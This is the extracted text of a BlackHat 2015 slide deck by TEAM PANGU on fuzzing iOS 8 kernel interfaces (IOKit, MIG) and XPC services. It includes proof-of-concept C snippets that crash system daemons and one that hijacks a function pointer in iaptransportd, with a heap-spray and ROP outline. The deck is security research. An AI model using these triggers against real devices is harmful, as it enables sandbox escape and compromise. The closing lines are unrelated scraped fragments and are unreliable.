Review And Exploit Neglected Attack Surface In IOS 8
Review and Exploit NeglectedAttack Surface in iOS 8Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGUBlackHat 2015
Agenda iOS Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System Exploit Userland XPC Services Conclusion
iOS Security Background Sandbox Code Sign Exploit Mitigation Data Protection Even hypervisor ?
Agenda iOS Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System Exploit Userland XPC Services Conclusion
Userland Local Attack Surface USB cable File access interface Backup/Restore interface APP management interface Developer interfaceInstalled app Jekyll App (USENIX Security 2013) Masque Attacks (FireEye Research)
Userland Remote Attack Surface Any network connection could be an attack surface Mobile Safari JailbreakMe Mobile Pwn2OwnMessager CVE-2009-2204, SMS vulnerability, Charlie Miller CVE-2015-1157, crafted Unicode text reboot bugSystem network daemons CVE-2015-1118, crafted configuration profile reboot bug
Kernel Attack Surface Any communication channel between the user spaceand the kernel is an attack surfaceUserSpaceBSD System CallsMach TrapKernel
Kernel Attack Surface Take a further lookUserSpaceioctlFile SystemDevicesIOKitMIG Kernel
Kernel Attack Surface File System HFS legacy volume name stack buffer overflow JailbreakMe 3 for iOS 4.2.xHFS heap overflow Corona for iOS 5.0
Kernel Attack Surface POSIX System Calls posix spawn improperly checks file action data p0sixspwn for iOS 6.1.3
Kernel Attack Surface ioctl Packet Filter Kernel Exploit DIOCADDRULE ioctl handler improper initialization Decrement value of any kernel addresslimera1n/greenpois0n for iOS 4.1
Kernel Attack Surface /dev/* ptmx get ioctl out-of-bounds memory access No bounds check of minor number of ptmx device evasi0n7 for iOS 7.0.x
Kernel Attack Surface IOKit - too many 0.0 IOSurface IOMobileFrameBuffer IOUSBDeviceFamily IOSharedDataQueue IOHIDFamily
This Talk Kernel Space Improve IOKit Fuzzing More IOKit MIG SystemUser Space XPC fuzzing
Agenda iOS Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System Exploit Userland XPC Services Conclusion
iOS Kernel Fuzzing IOKit is the best target for kernel fuzzing Most IOKit fuzzers focus on IOConnectCallMethod IOUserClient::externalMethod IOUserClient::getTargetAndMethodForIndex
Improve IOKit Fuzzing IOConnectCallMethod - io connect method io connect method calls mach msg to trap into the kernel IOConnectCallMethod is just a wrapper BUT affects how the kernel deals with the input/output structures Size 4096 - Uses IOMemoryDescriptor to map the memory Size 4096 - Directly calls copyin/copyout to access thememory
Improve IOKit Fuzzing
Improve IOKit Fuzzing Directly call io connect method rather than IOConnectCallMethod Be able to bypass the size restriction May fuzz more parts of IOKitExample - CVE-2014-4487 The vulnerable code is for overly large output structures But it can be triggered by very small output structures by callingio connect method directly
Improve IOKit Fuzzing DO NOT forget info leak bugs Check possible kernel space addresses in all outputsduring fuzzing
More IOKit Fuzzing Shared Memory Traps
Shared Memory of IOKit IOKit can share data directly with user space apps Assume user space apps know the structure of dataUser space apps just need to call IOConnectMapMemoryafter successfully calling IOServiceOpen memoryType may be meaningful for IOKit extensions
Shared Memory of IOKit How the kernel handles it Override IOUserClient::clientMemoryForType function Return an IOMemoryDescriptor objectExample code
Shared Memory of IOKit Improve fuzzing Try to open shared memory of IOKit Randomly fill the shared memory while fuzzing io connect methodExample CVE-2014-4418 - IODataQueue CVE-2014-4388 - IODataQueue CVE-2014-4461 - IOSharedDataQueueThe kernel should not trust shared memory data that could be modified by userspace apps
IOKit Traps User space function IOConnectTrap[0-6] - iokit user client trap Input index - function selector p1 p6 - six input parameters
IOKit Traps How the kernel handles it Get the IOExternalTrap structure from index Directly call the function pointer in IOExternalTrap - no more checks
IOKit Traps IOKit extensions may override two functions getTargetAndTrapForIndex - most likely to override this getExternalTrapForIndex
IOKit Traps Fuzzing Locate overridden functions - determine the range of indexTips The IOExternalTrap definition is different from XNU sourcestruct IOExternalTrap {IOService * object;IOTrapfunc; // if flag 0, func is real function pointerintflag; // if flag 1, real function *(IOTrap*)(vtable func)};
MIG System Lots of API finally call mach msg to trap into kernel mach vm * / mach port * / io connect * / IDA of io service close mach msg header t.msgh id
MIG System How the kernel handles it ipc kobject server finds mig hash t structure inmig buckets according to msgh id Call mig hash t.routine
MIG System Locate mig buckets toknow all valid msgh id mig init functioninitializes mig buckets mig e stores allsubsystem definitions
MIG System mig e in XNU source
MIG System mig e in IDA Get all useful information
MIG System Idea of fuzzing MIG system Roughly fuzzing all functions Accurately fuzzing each function Need to analyze the structure inside the message
IOKit Traps 0day IOStreamUserClient::getTargetAndTrapForIndex Restrict index 2 but only two IOExternalTrap elements in array! This code is just UNBELIEVABLE 0.0Still unfixed in iOS 8.4.1
Agenda iOS Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System Exploit Userland XPC Services Conclusion
IPC on iOS/OS X iOS and Mac OS X provide a large number of IPC mechanismsProcessSandbox Apple EventsShared MemoryPipesDistributed ObjectsServicesSocketsMach MessageXPC Two of most commonly used ways: Mach Message and XPC
Previous Work on Mach Message Mach messages are the fundamental of IPCs Through mach trap mach msg overwrite trap Mining Mach Services within OS X Sandbox. MederKydryraliev, 2013 Hacking at Mach2. Dai Zovi, 2011 Hacking at Mach Speed. Dai Zovi, 2011
XPC Introduced in OS X 10.7 Lion and iOS 5 in 2011 Built on Mach messages, and simplified the low leveldetails of IPC Simple interface to look up services by name Simple to send and receive asynchronous messages Strongly-typed messages
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);Use xpc connection create mach service() to setupa named system service on iOS
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);The name of the service (reserved in MachServices of system plist files)
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);XPC CONNECTION MACH SERVICE LISTENER indicates a server
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);xpc connection set event handler is called to specifythe connection handlers
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);xpc connection set event handler is called again to specifythe message handlers
XPC Services on iOS (Server)xpc connection t listener xpc connection create mach service("com.apple.xpc.example",NULL,XPC CONNECTION MACH SERVICE LISTENER);xpc connection set event handler(listener, (xpc object t peer) {// Connection dispatchxpc connection set event handler(peer, (xpc object t event) {// Message dispatchxpc type t type xpc get type(event);if (type XPC TYPE DICTIONARY){//Message handler}});xpc connection resume(peer);});xpc connection resume(listener);Parse the XPC dictionary and handle the data
XPC Services on iOS (Client)xpc connection t client xpc connection create mach service("com.apple.xpc.example",NULL,0);xpc connection set event handler(client, (xpc object t event) {//connection err handler});xpc connection resume(client);xpc object t message xpc dictionary create(NULL, NULL, 0);xpc dictionary set double(message, "value1", 1.0);xpc object t reply xpc connection send message with reply sync(client, message);
XPC Services on iOS (Client)xpc connection t client xpc connection create mach service("com.apple.xpc.example",NULL,0);xpc connection set event handler(client, (xpc object t event) {//connection err handler});xpc connection resume(client);xpc object t message xpc dictionary create(NULL, NULL, 0);xpc dictionary set double(message, "value1", 1.0);xpc object t reply xpc connection send message with reply sync(client, message);0 indicates a client
XPC Services on iOS (Client)xpc connection t client xpc connection create mach service("com.apple.xpc.example",NULL,0);xpc connection set event handler(client, (xpc object t event) {//connection err handler});xpc connection resume(client);xpc object t message xpc dictionary create(NULL, NULL, 0);xpc dictionary set double(message, "value1", 1.0);xpc object t reply xpc connection send message with reply sync(client, message);Create an XPC dictionary
XPC Services on iOS (Client)xpc connection t client xpc connection create mach service("com.apple.xpc.example",NULL,0);xpc connection set event handler(client, (xpc object t event) {//connection err handler});xpc connection resume(client);xpc object t message xpc dictionary create(NULL, NULL, 0);xpc dictionary set double(message, "value1", 1.0);xpc object t reply xpc connection send message with reply sync(client, message);Insert a double value in message
XPC Services on iOS (Client)xpc connection t client xpc connection create mach service("com.apple.xpc.example",NULL,0);xpc connection set event handler(client, (xpc object t event) {//connection err handler});xpc connection resume(client);xpc object t message xpc dictionary create(NULL, NULL, 0);xpc dictionary set double(message, "value1", 1.0);xpc object t reply xpc connection send message with reply sync(client, message);Send the message to the server and get a reply
XPC DataflowSerializationDeserializationMachmessagexpc dictSenderObject Dereferencexpc dictData DereferencexpcobjectsReceiverRaw Data
XPC DataflowSerializationDeserializationMachmessagexpc dictSenderObject Dereferencexpc dictData DereferencexpcobjectsReceiverRaw Data
Type Confusion VulnerabilitiesSerializationMachmessagexpc dictSender DeserializationObject Dereferencexpc dictData DereferencexpcobjectsRaw DataReceiverAuditing and Exploiting Apple IPC. Ian Beer, 2015
Type Confusion Vulnerabilities//get an object in untrusted messagexpc object t value xpc dictionary get value(untrustedMessage, “key");//presume it is an xpc type data and do not perform type validations.void* ptr xpc data get bytes ptr(value);Please refer to Ian Beer’s work for exploit details
Apple’s Fix//get an object in untrusted messagexpc object t value xpc dictionary get value(untrustedMessage, “key");//presume it is an xpc type data and do not perform type validations.void* ptr xpc data get bytes ptr(value);Perform type checks in all xpc * get * APIs, whicheliminates MANY type confusions
Our work: Focus on sagexpc dictSenderObject Dereferencexpc dictData DereferencexpcobjectsReceiverRaw Data
Passive Fuzzing Select a target service, hookxpc connection set event handler() function to getthe message handlers Hook the message handlers and mutate all receivedmessages
Proactive Fuzzing Find all connectable services bydecompiling the containersandbox profile Grepxpc connection create mach service to identify all xpc listeners XPC CONNECTION MACHSERVICE LISTENER
Retrieve Message Keys Use IDAPython script to find all xref ofxpc dictionary get * and analyze the stringsin R1
Fuzzing Results Run a fuzzer on iOS 8.2 Latest version at that momentCrash analysis Null pointer Out-of-bounds memory access “remote” code executionSome crashes might be fixed in iOS 8.4.
Null Pointer Dereference(calaccessd) Services presume the existence of certain keys in framework/Support/calaccessdxpc connection t client xpc connection create mach service("com.apple.calaccessd.xpc",xpc connection set event handler(client, void(xpc object t response) {});xpc connection resume(client);xpc object t dict xpc dictionary create(NULL,xpc dictionary set int64(dict, "message", 1);NULL, 0);//any message with the "function" key can trigger the crashxpc object t reply xpc connection send message with reply sync(client, dict);NULL, 0);
Out-of-Bounds Read mework/CVMServerPOC//construct and send the handshake messagexpc object t dict xpc dictionary create(NULL, NULL, 0);xpc dictionary set int64(dict, "message", 1);xpc object t reply xpc connection send message with reply sync(client, dict);xpc dictionary set int64(dict, "message", 4);xpc dictionary set string(dict, "framework name", "OpenCLCPU");xpc dictionary set string(dict, "bitcode name", "");xpc dictionary set string(dict, "plugin name", "");reply xpc connection send message with reply sync(client, dict);
More Memory Errors inlibsystem configuration.dylibdns config t * dns configuration copy(){.reply libSC send message with reply sync(dnsinfo client, reqdict);reply is passed from the “server”if (reply ! NULL) {.dataRef xpc dictionary get data(reply, DNSINFO CONFIGURATION, &dataLen);.if (n padding (DNS CONFIG BUF MAX - dataLen)) {size tlen;len dataLen n padding;buf malloc(len);bcopy((void *)dataRef, buf, dataLen);bzero(&buf[dataLen], n padding);}}if (buf ! NULL) {/* ALIGN: cast okay since dns config buf t is int aligned */config expand config(( dns config buf t *)(void *)buf);}dns config t *expand config( dns config buf t *buf){.padding &buf- attribute[ntohl(buf- n attribute)];n padding ntohl(buf- n padding);static
More Memory Errors inlibsystem configuration.dylibdns config t * dns configuration copy(){.reply libSC send message with reply sync(dnsinfo client, reqdict);if (reply ! NULL) {.dataRef xpc dictionary get data(reply, DNSINFO CONFIGURATION, &dataLen);dataRef is retrieved from reply.if (n padding (DNS CONFIG BUF MAX - dataLen)) {size tlen;len dataLen n padding;buf malloc(len);bcopy((void *)dataRef, buf, dataLen);bzero(&buf[dataLen], n padding);}}if (buf ! NULL) {/* ALIGN: cast okay since dns config buf t is int aligned */config expand config(( dns config buf t *)(void *)buf);}dns config t *expand config( dns config buf t *buf){.padding &buf- attribute[ntohl(buf- n attribute)];n padding ntohl(buf- n padding);static
More Memory Errors inlibsystem configuration.dylibdns config t * dns configuration copy(){.reply libSC send message with reply sync(dnsinfo client, reqdict);if (reply ! NULL) {.dataRef xpc dictionary get data(reply, DNSINFO CONFIGURATION, &dataLen);.if (n padding (DNS CONFIG BUF MAX - dataLen)) {size tlen;len dataLen n padding;buf malloc(len);bcopy((void *)dataRef, buf, dataLen);bzero(&buf[dataLen], n padding);}dataRef propagates to buf}if (buf ! NULL) {/* ALIGN: cast okay since dns config buf t is int aligned */config expand config(( dns config buf t *)(void *)buf);}buf is passed to expand configdns config t *expand config( dns config buf t *buf){.padding &buf- attribute[ntohl(buf- n attribute)];n padding ntohl(buf- n padding);static
More Memory Errors inlibsystem configuration.dylibdns config t * dns configuration copy(){.reply libSC send message with reply sync(dnsinfo client, reqdict);if (reply ! NULL) {.dataRef xpc dictionary get data(reply, DNSINFO CONFIGURATION, &dataLen);.if (n padding (DNS CONFIG BUF MAX - dataLen)) {size tlen;len dataLen n padding;buf malloc(len);bcopy((void *)dataRef, buf, dataLen);bzero(&buf[dataLen], n padding);}}if (buf ! NULL) {/* ALIGN: cast okay since dns config buf t is int aligned */config expand config(( dns config buf t *)(void *)buf);}buf- n attribute is used as an array indexdns config t *expand config( dns config buf t *buf){.padding &buf- attribute[ntohl(buf- n attribute)];n padding ntohl(buf- n padding);static
A Surprise incom.apple.iaptransportd.xpcv29 is retrieved from an XPC work/Support/iaptransportdxpc connection t client xpc connection create mach service("com.apple.iaptransportd.xpc",xpc connection set event handler(client, void(xpc object t response) {});xpc connection resume(client);xpc object t dict xpc dictionary create(NULL, NULL, 0);xpc dictionary set string(dict, "requestType", "setPortLockout");//requestType must be setPortLockoutxpc dictionary set uint64(dict, "portID", 0xAAAAAAAA);//*(*portID 32) will be the function pointerxpc object treply xpc connection send message with reply sync(client,dict);NULL, 0);
A Surprise incom.apple.iaptransportd.xpc*(*v29 32) is used as a function work/Support/iaptransportdxpc connection t client xpc connection create mach service("com.apple.iaptransportd.xpc",xpc connection set event handler(client, void(xpc object t response) {});xpc connection resume(client);xpc object t dict xpc dictionary create(NULL, NULL, 0);xpc dictionary set string(dict, "requestType", "setPortLockout");//requestType must be setPortLockoutxpc dictionary set uint64(dict, "portID", 0xAAAAAAAA);//*(*portID 32) will be the function pointerxpc object treply xpc connection send message with reply sync(client,dict);NULL, 0);
How to Exploit it How to control *(*portID 32) Where to find ROP gadgets? Heap Sprayingdyld shared cache is shared among all processes, and has the samelayout.Effects Exploitable by any container app Bypass the container sandbox to access the system
Agenda iOS Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System Exploit Userland XPC Services Conclusion
Conclusion The combination of previous techniques and newimprovements may lead to new findings Apple puts more efforts on improving the wholesecurity mechanisms rather than fixing individualbugs Reviewing all old code is necessary to Apple
Thanks for your attentionQ&A
BlackHat 2015 Review and Exploit Neglected Attack Surface in iOS
1. Download public exploit code 2. Add support for iOS modified shellcode . bling! Attack only worked on Jailbroken iOS 4.2.1 (5.1 current) Attack only worked on Android 2.0 / 2.1 (6.6%) App 1 App2 App 3 Kernel Drivers App 1 App2 App 3 Kernel Drivers. CrowdStrike Exploit Walkthrough . - Was already
actually functions in a real attack, what level of service you are able to provide while under attack, and how your people and process react to and withstand an attack. In this guide we present three options for simulating a DDoS attack in your own lab: Tier 1 — Simulating a basic attack using open-source software and readily available .
Additional adversarial attack defense methods (e.g., adversarial training, pruning) and conventional model regularization methods are examined as well. 2. Background and Related Works 2.1. Bit Flip based Adversarial Weight Attack The bit-flip based adversarial weight attack, aka. Bit-Flip Attack (BFA) [17], is an adversarial attack variant
In DDoS attack, the attacker try to interrupt the services of a server and utilizes its CPU and Network. Flooding DDOS attack is based on a huge volume of attack traffic which is termed as a Flooding based DDOS attack. Flooding-based DDOS attack attempts to congest the victim's network bandwidth with real-looking but unwanted IP data.
Magic standard attack, and 1 Speed counter-attack (diamond shape indicates counter-attack, circular shape indicates standard attack). The Crypt Bat may only initiate an attack form in which it has a standard attack available. In this case it’s Magic. Let’s res
Maximum Loss Attack De nition (Maximum Loss Attack) The maximum loss attack nds a perturbed data x by solving the optimization maximize x g t(x ) max j6 t fg j(x )g subject to kx x 0k ; (2) where kkcan be any norm speci ed by the user, and 0 denotes the attack strength. I want to bound my attack kx x 0k I want to make g t(x ) as big as possible
Attack Name 2. Attack Cost: Cost to play the card (Can be Gauge, Force or nothing) 3. Range: Which spaces the attack hits 4. Power: An attack’s outgoing damage 5. Speed: Determines who will resolve their attack first. 6. Armor: The attack’s defense against incomi
23. Sharma, P. D. [1991] : The Fungi (Rastogi & Co. Meerut) 24. Vasishta, B. R. [1990] : Fungi (S. Chand & Co. New Delhi) 25. Sharma, O. P. : Fungi (TMH)
